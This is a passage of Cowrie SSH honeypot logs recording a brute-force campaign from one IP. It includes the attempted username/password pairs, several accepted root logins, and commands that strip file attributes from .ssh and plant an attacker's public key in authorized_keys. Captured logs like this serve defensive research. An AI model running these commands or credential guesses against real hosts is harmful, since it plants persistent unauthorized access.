03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:48:06.884054Z","src_ip":"212.227.235.229","session":"04ffc86889e0"}
{"eventid":"cowrie.login.failed","username":"server","password":"Password1","message":"login attempt [server/Password1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:48:08.170637Z","src_ip":"212.227.235.229","session":"04ffc86889e0"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:48:09.484870Z","src_ip":"212.227.235.229","session":"04ffc86889e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36668,"dst_ip":"1.2.3.4","dst_port":22,"session":"88907b008f65","protocol":"ssh","message":"New connection: 212.227.235.229:36668 (1.2.3.4:22) [session: 88907b008f65]","sensor":"my-vps","timestamp":"2025-09-08T22:48:22.017706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:48:22.018645Z","src_ip":"212.227.235.229","session":"88907b008f65"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:48:22.279266Z","src_ip":"212.227.235.229","session":"88907b008f65"}
{"eventid":"cowrie.login.failed","username":"db1inst1","password":"abc123","message":"login attempt [db1inst1/abc123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:48:23.366282Z","src_ip":"212.227.235.229","session":"88907b008f65"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:48:24.629562Z","src_ip":"212.227.235.229","session":"88907b008f65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59782,"dst_ip":"1.2.3.4","dst_port":22,"session":"735bd651d057","protocol":"ssh","message":"New connection: 212.227.235.229:59782 (1.2.3.4:22) [session: 735bd651d057]","sensor":"my-vps","timestamp":"2025-09-08T22:48:26.488858Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:48:26.490554Z","src_ip":"212.227.235.229","session":"735bd651d057"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:48:26.725344Z","src_ip":"212.227.235.229","session":"735bd651d057"}
{"eventid":"cowrie.login.failed","username":"ts3","password":"1","message":"login attempt [ts3/1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:48:27.702341Z","src_ip":"212.227.235.229","session":"735bd651d057"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:48:28.939075Z","src_ip":"212.227.235.229","session":"735bd651d057"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46916,"dst_ip":"1.2.3.4","dst_port":22,"session":"669156997831","protocol":"ssh","message":"New connection: 212.227.235.229:46916 (1.2.3.4:22) [session: 669156997831]","sensor":"my-vps","timestamp":"2025-09-08T22:48:38.265810Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:48:38.266892Z","src_ip":"212.227.235.229","session":"669156997831"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:48:38.588757Z","src_ip":"212.227.235.229","session":"669156997831"}
{"eventid":"cowrie.login.failed","username":"tunnel","password":"changeme","message":"login attempt [tunnel/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T22:48:39.876210Z","src_ip":"212.227.235.229","session":"669156997831"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:48:41.200259Z","src_ip":"212.227.235.229","session":"669156997831"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54938,"dst_ip":"1.2.3.4","dst_port":22,"session":"913ce300be26","protocol":"ssh","message":"New connection: 212.227.235.229:54938 (1.2.3.4:22) [session: 913ce300be26]","sensor":"my-vps","timestamp":"2025-09-08T22:48:46.822928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:48:46.823745Z","src_ip":"212.227.235.229","session":"913ce300be26"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:48:46.922150Z","src_ip":"212.227.235.229","session":"913ce300be26"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwe123","message":"login attempt [root/Qwe123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:48:47.357224Z","src_ip":"212.227.235.229","session":"913ce300be26"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:48:47.606547Z","src_ip":"212.227.235.229","session":"913ce300be26"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:48:47.607358Z","src_ip":"212.227.235.229","session":"913ce300be26"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:48:47.608426Z","src_ip":"212.227.235.229","session":"913ce300be26"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:48:47.708667Z","src_ip":"212.227.235.229","session":"913ce300be26"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:48:47.977190Z","src_ip":"212.227.235.229","session":"913ce300be26"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:48:47.978129Z","src_ip":"212.227.235.229","session":"913ce300be26"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:48:48.079708Z","src_ip":"212.227.235.229","session":"913ce300be26"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:48:48.080600Z","src_ip":"212.227.235.229","session":"913ce300be26"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54944,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec74648aad4e","protocol":"ssh","message":"New connection: 212.227.235.229:54944 (1.2.3.4:22) [session: ec74648aad4e]","sensor":"my-vps","timestamp":"2025-09-08T22:48:48.177444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:48:48.178261Z","src_ip":"212.227.235.229","session":"ec74648aad4e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:48:48.276734Z","src_ip":"212.227.235.229","session":"ec74648aad4e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:48:48.712797Z","src_ip":"212.227.235.229","session":"ec74648aad4e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:48:49.813699Z","src_ip":"212.227.235.229","session":"ec74648aad4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54960,"dst_ip":"1.2.3.4","dst_port":22,"session":"d146f2478644","protocol":"ssh","message":"New connection: 212.227.235.229:54960 (1.2.3.4:22) [session: d146f2478644]","sensor":"my-vps","timestamp":"2025-09-08T22:48:49.914547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:48:49.915275Z","src_ip":"212.227.235.229","session":"d146f2478644"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:48:50.017940Z","src_ip":"212.227.235.229","session":"d146f2478644"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:48:50.459518Z","src_ip":"212.227.235.229","session":"d146f2478644"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:48:50.560545Z","src_ip":"212.227.235.229","session":"d146f2478644"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:48:50.561266Z","src_ip":"212.227.235.229","session":"913ce300be26"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53552,"dst_ip":"1.2.3.4","dst_port":22,"session":"7eeccea8e9ac","protocol":"ssh","message":"New connection: 212.227.125.160:53552 (1.2.3.4:22) [session: 7eeccea8e9ac]","sensor":"my-vps","timestamp":"2025-09-08T22:48:54.530421Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:48:54.675554Z","src_ip":"212.227.125.160","session":"7eeccea8e9ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40094,"dst_ip":"1.2.3.4","dst_port":22,"session":"081e5e01ec53","protocol":"ssh","message":"New connection: 212.227.235.229:40094 (1.2.3.4:22) [session: 081e5e01ec53]","sensor":"my-vps","timestamp":"2025-09-08T22:48:57.260608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:48:57.281883Z","src_ip":"212.227.235.229","session":"081e5e01ec53"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:48:57.532721Z","src_ip":"212.227.235.229","session":"081e5e01ec53"}
{"eventid":"cowrie.login.failed","username":"mithun","password":"mithun","message":"login attempt [mithun/mithun] failed","sensor":"my-vps","timestamp":"2025-09-08T22:48:58.539430Z","src_ip":"212.227.235.229","session":"081e5e01ec53"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:48:59.797402Z","src_ip":"212.227.235.229","session":"081e5e01ec53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37866,"dst_ip":"1.2.3.4","dst_port":22,"session":"f79790dbc489","protocol":"ssh","message":"New connection: 212.227.235.229:37866 (1.2.3.4:22) [session: f79790dbc489]","sensor":"my-vps","timestamp":"2025-09-08T22:49:32.386714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:49:32.387596Z","src_ip":"212.227.235.229","session":"f79790dbc489"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:49:32.697431Z","src_ip":"212.227.235.229","session":"f79790dbc489"}
{"eventid":"cowrie.login.success","username":"root","password":"1221","message":"login attempt [root/1221] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:49:33.978551Z","src_ip":"212.227.235.229","session":"f79790dbc489"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:49:34.618352Z","src_ip":"212.227.235.229","session":"f79790dbc489"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:49:34.619153Z","src_ip":"212.227.235.229","session":"f79790dbc489"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:49:34.620118Z","src_ip":"212.227.235.229","session":"f79790dbc489"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:34.931840Z","src_ip":"212.227.235.229","session":"f79790dbc489"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:49:35.660715Z","src_ip":"212.227.235.229","session":"f79790dbc489"}
